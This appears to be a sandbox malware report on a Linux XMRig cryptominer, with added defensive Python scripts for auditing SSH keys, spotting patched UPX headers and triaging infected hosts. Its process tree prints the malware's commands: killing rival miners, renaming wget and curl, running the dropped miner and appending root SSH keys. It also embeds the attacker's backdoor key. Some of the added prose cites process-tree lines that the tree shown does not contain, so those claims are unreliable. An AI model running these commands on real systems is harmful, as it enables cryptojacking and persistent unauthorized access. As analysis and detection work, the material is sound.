Analysis

max time kernel: 48s
max time network: 51s
platform: ubuntu-22.04_amd64
resource: ubuntu2204-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
submitted: 03/12/2024, 23:54

Behavioral task: behavioral1
Sample: work32
Resource: ubuntu2204-amd64-20240611-en

General

Target: work32
Size: 4.2MB
MD5: 06e1f988471336d788da0fcaa29ed50b
SHA1: 2fa461cd8f0614dfb86f845aef47c42910370b00
SHA256: 7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e
SHA512: 4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180
SSDEEP: 98304:Wr3wZHTOxuXKMHQOdgK6a4mR3chE+Agclmvj2iw+w:WbwZDXDHQOdg0Bo6l
Malware Config
Signatures

Xmrig family

XMRig Miner payload (1 IoC)
  yara rule: behavioral1/memory/1753-3-0x0000000008048000-0x00000000084c01a4-memory.dmp  xmrig

Adds new SSH keys (1 TTP, 2 IoCs)
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
  File opened for modification  /root/.ssh/authorized_keys  (sh)
  File opened for modification  /root/.ssh/authorized_keys  (sh)
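The two modifications above are an `echo >>` and an `echo "ssh-rsa ... root@u911" >>` (see the process tree further down), so the attacker's key ends up as one more line in root's authorized_keys. The script below is an added example, not part of this report or of the sample: it parses authorized_keys lines, checks that the base64 blob's embedded type matches the declared type, computes the same SHA256 fingerprint `ssh-keygen -lf` prints, and reports every key that is not on an allowlist of known fingerprints. The ssh-rsa line is the one the sample appended; the ssh-ed25519 allowlisted key is constructed from a fixed 32-byte value and is not a real key.

```python
import base64
import hashlib
import struct

KEY_TYPES = (
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)

# The exact line the sample appends to /root/.ssh/authorized_keys (copied from the process tree in this report).
ATTACKER_KEY_LINE = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911"
)


def ssh_fields(blob: bytes) -> list:
    """Split an SSH public-key blob into its length-prefixed fields (RFC 4253 'string'/'mpint' encoding)."""
    fields, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack_from(">I", blob, off)
        off += 4
        if off + n > len(blob):
            raise ValueError("truncated key blob")
        fields.append(blob[off:off + n])
        off += n
    return fields


def fingerprint(blob: bytes) -> str:
    """Same value `ssh-keygen -lf` prints: SHA256 of the raw blob, base64 without '=' padding."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def describe_key(line: str) -> dict:
    """Parse one authorized_keys line into type, size, fingerprint, comment and any leading options."""
    parts = line.split()
    try:
        idx = next(i for i, tok in enumerate(parts) if tok in KEY_TYPES)  # tokens before it are options
    except StopIteration:
        raise ValueError(f"no recognised key type in line: {line[:40]!r}") from None
    key_type, b64 = parts[idx], parts[idx + 1]
    blob = base64.b64decode(b64, validate=True)
    fields = ssh_fields(blob)
    if fields[0] != key_type.encode():  # the blob carries its own type; a mismatch means a tampered line
        raise ValueError(f"type mismatch: line says {key_type}, blob says {fields[0]!r}")
    if key_type == "ssh-rsa":
        bits = int.from_bytes(fields[2], "big").bit_length()   # fields: type, e, n; key size is the size of n
    elif key_type == "ssh-ed25519":
        bits = len(fields[1]) * 8
    else:
        bits = None
    return {
        "type": key_type,
        "bits": bits,
        "fingerprint": fingerprint(blob),
        "comment": " ".join(parts[idx + 2:]),
        "options": " ".join(parts[:idx]),
    }


def audit_authorized_keys(text: str, allowlist: set) -> list:
    """Return every key whose fingerprint is not on the allowlist; those are the entries to investigate."""
    unknown = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            entry = describe_key(line)
            if entry["fingerprint"] not in allowlist:
                unknown.append(entry)
    return unknown


def constructed_ed25519_line(comment: str = "admin@bastion") -> str:
    """Syntactically valid ssh-ed25519 line built from a fixed 32-byte value (constructed test data, not a real key)."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(range(32))
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


if __name__ == "__main__":
    known = {describe_key(constructed_ed25519_line())["fingerprint"]}
    with open("/root/.ssh/authorized_keys") as fh:
        for entry in audit_authorized_keys(fh.read(), known):
            print(f"UNKNOWN {entry['type']} {entry['bits']} {entry['fingerprint']} {entry['comment']}")
```

Comparing fingerprints rather than the raw line is what makes this robust: the attacker can change the comment or prepend options, but the fingerprint of the blob stays the same, and a key size far from your policy (here a 2048-bit RSA key with the comment root@u911) is a second cue even before the allowlist lookup.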
Contacts a large (1879) amount of remote hosts (1 TTP)
This may indicate a network scan to discover remotely running services.

Patched UPX-packed file (2 IoCs)
Sample is packed with UPX but required header fields are zeroed out to prevent unpacking with the default UPX tool.
  yara rule: behavioral1/files/fstream-2.dat  patched_upx
  yara rule: behavioral1/files/fstream-9.dat  patched_upx
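The "required header fields" the signature refers to are the `p_info` sizes UPX writes right after its `l_info` header at the start of the compressed payload; with `p_filesize`/`p_blocksize` zeroed, stock `upx -d` rejects the file even though the decompression stub still runs. The following checker is an added example (not the sandbox's yara rule and not anything from the sample): it locates the `UPX!` magic, parses the two headers and reports whether the size fields were zeroed. The header layout is taken from UPX's stub structures and is an assumption of this example; the test images are constructed byte strings, not real binaries.

```python
import struct

UPX_MAGIC = b"UPX!"

# Header pair that UPX places in front of the compressed payload of a packed ELF.
# Layout taken from UPX's own stub definitions (an assumption of this example, not something the report states):
#   struct l_info { u32 l_checksum; u32 l_magic /* "UPX!" */; u16 l_lsize; u8 l_version; u8 l_format; }
#   struct p_info { u32 p_progid;   u32 p_filesize;  u32 p_blocksize; }
L_INFO = struct.Struct("<I4sHBB")
P_INFO = struct.Struct("<III")


def find_upx_headers(data: bytes):
    """Locate the first UPX! magic and return (l_info offset, l_info tuple, p_info tuple), or None."""
    idx = data.find(UPX_MAGIC)
    if idx < 4:                                # not found, or too early to be l_magic (second field of l_info)
        return None
    l_off = idx - 4
    if l_off + L_INFO.size + P_INFO.size > len(data):
        return None
    return l_off, L_INFO.unpack_from(data, l_off), P_INFO.unpack_from(data, l_off + L_INFO.size)


def classify_upx(data: bytes) -> str:
    """
    Coarse verdict on one file image:
      'not-upx'      no UPX! magic found (unpacked, or packed with the magic overwritten as well)
      'upx'          magic present and the p_info size fields are populated
      'patched-upx'  magic present but p_filesize/p_blocksize zeroed; stock `upx -d` rejects such a file
    Files whose magic was overwritten fall into 'not-upx' here; the sandbox's yara rule keys on the
    decompression stub code instead, which this header check does not attempt.
    """
    hdr = find_upx_headers(data)
    if hdr is None:
        return "not-upx"
    _, _, (_progid, filesize, blocksize) = hdr
    return "patched-upx" if filesize == 0 or blocksize == 0 else "upx"


def classify_file(path: str) -> str:
    """Run the check on a file on disk, e.g. the fstream-2.dat / fstream-9.dat drops named above."""
    with open(path, "rb") as fh:
        return classify_upx(fh.read())


def build_sample(filesize: int, blocksize: int, magic: bytes = UPX_MAGIC) -> bytes:
    """Constructed test image: a 64-byte ELF64 header stub followed by l_info/p_info (not a runnable binary)."""
    ehdr = b"\x7fELF\x02\x01\x01" + b"\x00" * 57            # e_ident plus zeroed remainder of the 64-byte header
    l_info = L_INFO.pack(0, magic, 0, 13, 0)                 # checksum, magic, lsize, version, format (values arbitrary here)
    p_info = P_INFO.pack(0, filesize, blocksize)
    return ehdr + l_info + p_info + b"\x00" * 32              # trailing bytes stand in for the compressed payload


if __name__ == "__main__":
    import sys
    for name in sys.argv[1:]:
        print(name, classify_file(name))
```

When the verdict is `patched-upx`, restoring the two size fields from the PackHeader trailer UPX leaves at the end of the file is usually enough to make `upx -d` work again; when it is `not-upx` on a file the yara rule still flags, the magic itself was overwritten and you are better off dumping the process from memory, which is what the XMRig Miner payload signature above did (the memory.dmp region of PID 1753).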
File and Directory Permissions Modification (1 TTP, 6 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  PID 1751 chmod, PID 1755 sh, PID 1757 chmod, PID 1763 sh, PID 1765 chmod, PID 1750 sh

Executes dropped EXE (3 IoCs)
  /tmp/xmr        PID 1753  xmr
  /tmp/secure.sh  PID 1761  secure.sh
  /tmp/auth.sh    PID 1769  auth.sh

Checks hardware identifiers (DMI) (1 TTP, 4 IoCs)
Reads DMI information that indicates whether the system is a virtual machine.
  File opened for reading by xmr, under /sys/devices/virtual/dmi/id/: product_name, board_vendor, bios_vendor, sys_vendor

Creates a large amount of network flows (1 TTP)
This may indicate a network scan to discover remotely running services.

Creates/modifies Cron job (1 TTP, 2 IoCs)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  File opened for modification  /var/spool/cron/crontabs/root  (work32)
  File opened for modification  /etc/crontab  (work32)

Enumerates running processes
Discovers information about currently running processes on the system.

Reads hardware information (1 TTP, 14 IoCs)
Accesses system info like serial numbers, manufacturer names etc.
  File opened for reading by xmr, under /sys/devices/virtual/dmi/id/: chassis_vendor, chassis_version, bios_version, board_version, chassis_asset_tag, bios_date, product_uuid, chassis_type, product_version, product_serial, board_name, board_serial, board_asset_tag, chassis_serial

UPX packed file (yara rule upx, 2 IoCs)
  yara rule: behavioral1/files/fstream-2.dat  upx
  yara rule: behavioral1/files/fstream-9.dat  upx

Checks CPU configuration (1 TTP, 1 IoC)
Reads CPU information that indicates whether the system is a virtual machine.
  File opened for reading  /proc/cpuinfo  (xmr)

Reads CPU attributes (1 TTP, 38 IoCs)
  /sys/devices/system/cpu/online    opened for reading by ps (18 times), kill (18 times) and xmr (once)
  /sys/devices/system/cpu/possible  opened for reading by xmr (once)

Enumerates kernel/hardware configuration (1 TTP, 56 IoCs)
Reads contents of /sys virtual filesystem to enumerate system information.
  work32: /sys/kernel/mm/transparent_hugepage/hpage_pmd_size (twice)
  xmr, CPU topology and caches: /sys/devices/system/cpu, /sys/bus/cpu/devices, /sys/bus/cpu/devices/cpu0/topology/{core_cpus,die_cpus,package_cpus,physical_package_id,core_id}, /sys/bus/cpu/devices/cpu0/cache/index0/{level,type,size,shared_cpu_map,coherency_line_size,number_of_sets,physical_line_partition}, index1/{level,type,shared_cpu_map}, index2/{level,type,size,shared_cpu_map,coherency_line_size,number_of_sets,physical_line_partition}, index3/{level,type,size,shared_cpu_map,coherency_line_size,number_of_sets,physical_line_partition}, index4/shared_cpu_map, index5/shared_cpu_map, index6/shared_cpu_map, index7/shared_cpu_map, index8/shared_cpu_map, index9/shared_cpu_map
  xmr, NUMA and huge pages: /sys/devices/system/node/online, /sys/bus/node/devices/node0/{cpumap,meminfo,hugepages,access0/initiators}, /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages, /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages, /sys/kernel/mm/hugepages, /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages, /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages
  xmr, cgroups, DAX and DMI: /sys/fs/cgroup/cgroup.controllers, /sys/fs/cgroup/cpuset.cpus.effective, /sys/fs/cgroup/cpuset.mems.effective, /sys/bus/dax/devices, /sys/bus/dax/devices/target_node, /sys/bus/dax/target_node, /sys/devices/virtual/dmi/id

Reads runtime system information
  ps: /proc/<pid>/stat for PIDs 25, 95, 96, 118, 219, 373, 589, 603, 632, 780, 1085, 1090, 1145, 1177 (twice), 1202, 1299, 1323, 1537; /proc/<pid>/status for PIDs 5, 12, 15, 20, 22, 85, 88, 91, 93, 96, 160, 406, 409, 425, 523, 741, 1162 (twice), 1192, 1277 (twice), 1294, 1299, 1320, 1707; /proc/<pid>/cmdline for PIDs 81, 92, 96, 223, 632, 962, 1040, 1085, 1184, 1323, 1419, 1643, 1660; plus /proc/uptime, /proc/stat, /proc/meminfo and /proc/sys/kernel/pid_max
  grep: /proc/self/maps
  xargs: /proc/self/fd
  killall: /proc/1317/stat

System Network Configuration Discovery (1 TTP, 4 IoCs)
Adversaries may gather information about the network configuration of a system.
  PID 1806 sh, PID 1797 sh, PID 1799 sh, PID 1803 sh

Writes file to tmp directory (4 IoCs)
Malware often drops required files in the /tmp directory.
  File opened for modification by work32: /tmp/config.json, /tmp/xmr, /tmp/secure.sh, /tmp/auth.sh
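Taken together, the signatures above and the process tree below give a short list of host artefacts: the four drops in /tmp, the /usr/.work staging copy, wget and curl renamed to wget1/curl1, entries in /etc/crontab and root's crontab, and the root@u911 key in root's authorized_keys. The following script is an added example (not part of this report or of any vendor tooling) that checks a host, or an offline image mounted under some root, for exactly those artefacts. The fixture builder creates a constructed fake root tree so the checks can be run without an infected machine; the cron pattern is an assumption about what should never appear in cron on a normal host.

```python
import re
import tempfile
from pathlib import Path

# Everything below is taken from the signatures and process tree of this report.
DROPPED_FILES = ["tmp/xmr", "tmp/config.json", "tmp/secure.sh", "tmp/auth.sh"]
STAGING_DIR = "usr/.work"
RENAMED_TOOLS = {"usr/bin/wget1": "usr/bin/wget", "usr/bin/curl1": "usr/bin/curl"}
CRON_FILES = ["etc/crontab", "var/spool/cron/crontabs/root"]
AUTHORIZED_KEYS = "root/.ssh/authorized_keys"
ATTACKER_KEY_COMMENT = "root@u911"
# Cron command text that has no business on a server (assumption of this example, not from the report).
CRON_SUSPICIOUS = re.compile(r"/tmp/|/usr/\.work|\bxmr\b")


def triage(root="/") -> list:
    """Return human-readable findings for the host rooted at `root` (pass a mount point for an offline image)."""
    root = Path(root)
    findings = []
    for rel in DROPPED_FILES:
        if (root / rel).exists():
            findings.append(f"dropped file present: /{rel}")
    if (root / STAGING_DIR).is_dir():
        findings.append(f"staging directory present: /{STAGING_DIR}")
    for renamed, original in RENAMED_TOOLS.items():
        # the sample does `mv /usr/bin/wget /usr/bin/wget1`, so the renamed copy exists and the original is gone
        if (root / renamed).exists() and not (root / original).exists():
            findings.append(f"tool renamed: /{original} -> /{renamed}")
    for rel in CRON_FILES:
        path = root / rel
        if path.is_file():
            for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
                entry = line.strip()
                if entry and not entry.startswith("#") and CRON_SUSPICIOUS.search(entry):
                    findings.append(f"suspicious cron entry /{rel}:{n}: {entry}")
    keys = root / AUTHORIZED_KEYS
    if keys.is_file():
        for n, line in enumerate(keys.read_text(errors="replace").splitlines(), 1):
            if ATTACKER_KEY_COMMENT in line:
                findings.append(f"attacker key comment {ATTACKER_KEY_COMMENT!r} in /{AUTHORIZED_KEYS} line {n}")
    return findings


def _write(root: Path, rel: str, text: str = "") -> None:
    path = root / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)


def build_fixture(infected: bool) -> str:
    """Constructed fake root tree (not a real host image) so the checks can be exercised offline."""
    root = Path(tempfile.mkdtemp(prefix="work32-triage-"))
    _write(root, "etc/crontab", "# system crontab\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    _write(root, "usr/bin/wget", "")
    _write(root, "usr/bin/curl", "")
    if infected:
        _write(root, "tmp/xmr", "")
        _write(root, "tmp/config.json", "{}")
        (root / STAGING_DIR).mkdir(parents=True)
        (root / "usr/bin/wget").rename(root / "usr/bin/wget1")   # what `mv /usr/bin/wget /usr/bin/wget1` leaves behind
        _write(root, "var/spool/cron/crontabs/root", "*/10 * * * * /tmp/xmr\n")
        # key material shortened for the fixture; only the comment matters to this check
        _write(root, "root/.ssh/authorized_keys", "ssh-rsa AAAAB3NzaC1yc2E root@u911\n")
    return str(root)


if __name__ == "__main__":
    import sys
    for finding in triage(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(finding)
```

The key comment is the weakest of these checks (it is trivially changed between campaigns); the renamed wget/curl and the /usr/.work directory are the ones worth keeping in a baseline, because they are side effects the operator needs for the rest of the install to work. Running the script against a mounted image rather than the live host also avoids the `ps`-based kill loops in the process tree below interfering with your tooling.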
Processes
Indentation is process depth; each entry is [PID] image path: command line, followed in braces by the signatures it triggered. The four kill entries under each xargs share one PID: they are the successive execve attempts along PATH for the same child, and only the /usr/bin/kill attempt actually ran (it is the one carrying a signature). The mv, secure.sh, auth.sh and cp processes were started with a trailing & by the sh -c lines in the main tree and are listed as separate top-level entries.

[1596] /tmp/work32: /tmp/work32  {Enumerates kernel/hardware configuration}
    [1601] /tmp/work32: /tmp/work32 -deamon  {Creates/modifies Cron job; Enumerates kernel/hardware configuration; Writes file to tmp directory}
        [1618] /usr/bin/sh: sh -c "ps -ef | grep Circle_MI | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1621] /usr/bin/grep: grep -v grep
            [1620] /usr/bin/grep: grep Circle_MI
            [1622] /usr/bin/awk: awk "{print \$2}"
            [1623] /usr/bin/xargs: xargs kill -9
                [1624] /usr/local/sbin/kill: kill -9
                [1624] /usr/local/bin/kill: kill -9
                [1624] /usr/sbin/kill: kill -9
                [1624] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1619] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1625] /usr/bin/sh: sh -c "ps -ef | grep kworker34 | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1628] /usr/bin/grep: grep -v grep
            [1627] /usr/bin/grep: grep kworker34
            [1629] /usr/bin/awk: awk "{print \$2}"
            [1630] /usr/bin/xargs: xargs kill -9
                [1631] /usr/local/sbin/kill: kill -9
                [1631] /usr/local/bin/kill: kill -9
                [1631] /usr/sbin/kill: kill -9
                [1631] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1626] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1632] /usr/bin/sh: sh -c "ps -ef | grep .daemond | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1635] /usr/bin/grep: grep -v grep
            [1634] /usr/bin/grep: grep .daemond
            [1633] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
            [1636] /usr/bin/awk: awk "{print \$2}"
            [1637] /usr/bin/xargs: xargs kill -9
                [1638] /usr/local/sbin/kill: kill -9
                [1638] /usr/local/bin/kill: kill -9
                [1638] /usr/sbin/kill: kill -9
                [1638] /usr/bin/kill: kill -9  {Reads CPU attributes}
        [1639] /usr/bin/sh: sh -c "ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1644] /usr/bin/xargs: xargs kill -9
                [1645] /usr/local/sbin/kill: kill -9
                [1645] /usr/local/bin/kill: kill -9
                [1645] /usr/sbin/kill: kill -9
                [1645] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1643] /usr/bin/awk: awk "{print \$2}"
            [1642] /usr/bin/grep: grep -v grep
            [1641] /usr/bin/grep: grep /tmp/thisxxs
            [1640] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1646] /usr/bin/sh: sh -c "ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1651] /usr/bin/xargs: xargs kill -9
                [1652] /usr/local/sbin/kill: kill -9
                [1652] /usr/local/bin/kill: kill -9
                [1652] /usr/sbin/kill: kill -9
                [1652] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1650] /usr/bin/awk: awk "{print \$2}"
            [1649] /usr/bin/grep: grep -v grep
            [1648] /usr/bin/grep: grep /opt/yilu/work/xig/xig
            [1647] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1653] /usr/bin/sh: sh -c "ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1658] /usr/bin/xargs: xargs kill -9
                [1659] /usr/local/sbin/kill: kill -9
                [1659] /usr/local/bin/kill: kill -9
                [1659] /usr/sbin/kill: kill -9
                [1659] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1657] /usr/bin/awk: awk "{print \$2}"
            [1656] /usr/bin/grep: grep -v grep
            [1655] /usr/bin/grep: grep /opt/yilu/mservice
            [1654] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1660] /usr/bin/sh: sh -c "ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1663] /usr/bin/grep: grep -v grep
            [1664] /usr/bin/awk: awk "{print \$2}"
            [1662] /usr/bin/grep: grep /usr/bin/.sshd
            [1665] /usr/bin/xargs: xargs kill -9
                [1666] /usr/local/sbin/kill: kill -9
                [1666] /usr/local/bin/kill: kill -9
                [1666] /usr/sbin/kill: kill -9
                [1666] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1661] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1667] /usr/bin/sh: sh -c "ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1672] /usr/bin/xargs: xargs kill -9
                [1673] /usr/local/sbin/kill: kill -9
                [1673] /usr/local/bin/kill: kill -9
                [1673] /usr/sbin/kill: kill -9
                [1673] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1671] /usr/bin/awk: awk "{print \$2}"
            [1670] /usr/bin/grep: grep -v grep
            [1669] /usr/bin/grep: grep /usr/bin/bsd-port/getty
            [1668] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1674] /usr/bin/sh: sh -c "ps -ef | grep x86_ | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1679] /usr/bin/xargs: xargs kill -9
                [1680] /usr/local/sbin/kill: kill -9
                [1680] /usr/local/bin/kill: kill -9
                [1680] /usr/sbin/kill: kill -9
                [1680] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1678] /usr/bin/awk: awk "{print \$2}"
            [1677] /usr/bin/grep: grep -v grep
            [1676] /usr/bin/grep: grep x86_
            [1675] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1681] /usr/bin/sh: sh -c "ps -ef | grep cryptonight | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1686] /usr/bin/xargs: xargs kill -9
                [1687] /usr/local/sbin/kill: kill -9
                [1687] /usr/local/bin/kill: kill -9
                [1687] /usr/sbin/kill: kill -9
                [1687] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1685] /usr/bin/awk: awk "{print \$2}"
            [1684] /usr/bin/grep: grep -v grep
            [1683] /usr/bin/grep: grep cryptonight
            [1682] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1688] /usr/bin/sh: sh -c "ps -ef | grep ddg | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1693] /usr/bin/xargs: xargs kill -9
                [1694] /usr/local/sbin/kill: kill -9
                [1694] /usr/local/bin/kill: kill -9
                [1694] /usr/sbin/kill: kill -9
                [1694] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1692] /usr/bin/awk: awk "{print \$2}"
            [1691] /usr/bin/grep: grep -v grep
            [1690] /usr/bin/grep: grep ddg
            [1689] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1695] /usr/bin/sh: sh -c "ps -ef | grep prohash | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1700] /usr/bin/xargs: xargs kill -9
                [1701] /usr/local/sbin/kill: kill -9
                [1701] /usr/local/bin/kill: kill -9
                [1701] /usr/sbin/kill: kill -9
                [1701] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1699] /usr/bin/awk: awk "{print \$2}"
            [1698] /usr/bin/grep: grep -v grep
            [1697] /usr/bin/grep: grep prohash
            [1696] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1702] /usr/bin/sh: sh -c "ps -ef | grep monero | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1707] /usr/bin/xargs: xargs kill -9
                [1708] /usr/local/sbin/kill: kill -9
                [1708] /usr/local/bin/kill: kill -9
                [1708] /usr/sbin/kill: kill -9
                [1708] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1706] /usr/bin/awk: awk "{print \$2}"
            [1705] /usr/bin/grep: grep -v grep
            [1704] /usr/bin/grep: grep monero
            [1703] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1709] /usr/bin/sh: sh -c "ps -ef | grep xmr | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1714] /usr/bin/xargs: xargs kill -9
                [1715] /usr/local/sbin/kill: kill -9
                [1715] /usr/local/bin/kill: kill -9
                [1715] /usr/sbin/kill: kill -9
                [1715] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1713] /usr/bin/awk: awk "{print \$2}"
            [1712] /usr/bin/grep: grep -v grep
            [1711] /usr/bin/grep: grep xmr  {Reads runtime system information}
            [1710] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1716] /usr/bin/sh: sh -c "ps -ef | grep miner | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1721] /usr/bin/xargs: xargs kill -9  {Reads runtime system information}
                [1722] /usr/local/sbin/kill: kill -9
                [1722] /usr/local/bin/kill: kill -9
                [1722] /usr/sbin/kill: kill -9
                [1722] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1720] /usr/bin/awk: awk "{print \$2}"
            [1719] /usr/bin/grep: grep -v grep
            [1718] /usr/bin/grep: grep miner
            [1717] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1723] /usr/bin/sh: sh -c "ps -ef | grep pool. | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1728] /usr/bin/xargs: xargs kill -9
                [1729] /usr/local/sbin/kill: kill -9
                [1729] /usr/local/bin/kill: kill -9
                [1729] /usr/sbin/kill: kill -9
                [1729] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1727] /usr/bin/awk: awk "{print \$2}"
            [1726] /usr/bin/grep: grep -v grep
            [1725] /usr/bin/grep: grep pool.
            [1724] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1730] /usr/bin/sh: sh -c "ps -ef | grep tcp: | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1735] /usr/bin/xargs: xargs kill -9
                [1736] /usr/local/sbin/kill: kill -9
                [1736] /usr/local/bin/kill: kill -9
                [1736] /usr/sbin/kill: kill -9
                [1736] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1734] /usr/bin/awk: awk "{print \$2}"
            [1733] /usr/bin/grep: grep -v grep
            [1732] /usr/bin/grep: grep tcp:
            [1731] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1737] /usr/bin/sh: sh -c "ps -ef | grep stratum | grep -v grep | awk '{print \$2}' | xargs kill -9"
            [1742] /usr/bin/xargs: xargs kill -9
                [1743] /usr/local/sbin/kill: kill -9
                [1743] /usr/local/bin/kill: kill -9
                [1743] /usr/sbin/kill: kill -9
                [1743] /usr/bin/kill: kill -9  {Reads CPU attributes}
            [1741] /usr/bin/awk: awk "{print \$2}"
            [1740] /usr/bin/grep: grep -v grep
            [1739] /usr/bin/grep: grep stratum
            [1738] /usr/bin/ps: ps -ef  {Reads CPU attributes; Reads runtime system information}
        [1744] /usr/bin/sh: sh -c "killall xmr"
            [1745] /usr/bin/killall: killall xmr  {Reads runtime system information}
        [1746] /usr/bin/sh: sh -c "mv /usr/bin/wget /usr/bin/wget1&"
        [1748] /usr/bin/sh: sh -c "mv /usr/bin/curl /usr/bin/curl1&"
        [1750] /usr/bin/sh: sh -c "chmod +x /tmp/xmr"  {File and Directory Permissions Modification}
            [1751] /usr/bin/chmod: chmod +x /tmp/xmr  {File and Directory Permissions Modification}
        [1752] /usr/bin/sh: sh -c /tmp/xmr
            [1753] /tmp/xmr: /tmp/xmr  {Executes dropped EXE; Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration}
        [1755] /usr/bin/sh: sh -c "chmod +x /tmp/secure.sh"  {File and Directory Permissions Modification}
            [1757] /usr/bin/chmod: chmod +x /tmp/secure.sh  {File and Directory Permissions Modification}
        [1759] /usr/bin/sh: sh -c "/tmp/secure.sh&"
        [1763] /usr/bin/sh: sh -c "chmod +x /tmp/auth.sh"  {File and Directory Permissions Modification}
            [1765] /usr/bin/chmod: chmod +x /tmp/auth.sh  {File and Directory Permissions Modification}
        [1767] /usr/bin/sh: sh -c "/tmp/auth.sh&"
        [1770] /usr/bin/sh: sh -c "mkdir -p /usr/.work"
            [1777] /usr/bin/mkdir: mkdir -p /usr/.work
        [1779] /usr/bin/sh: sh -c "\\cp -R /tmp/* /usr/.work/ &"
        [1783] /usr/bin/sh: sh -c "chmod 700 /root/.ssh/"
            [1790] /usr/bin/chmod: chmod 700 /root/.ssh/
        [1791] /usr/bin/sh: sh -c "echo >> /root/.ssh/authorized_keys"  {Adds new SSH keys}
        [1793] /usr/bin/sh: sh -c "chmod 600 /root/.ssh/authorized_keys"
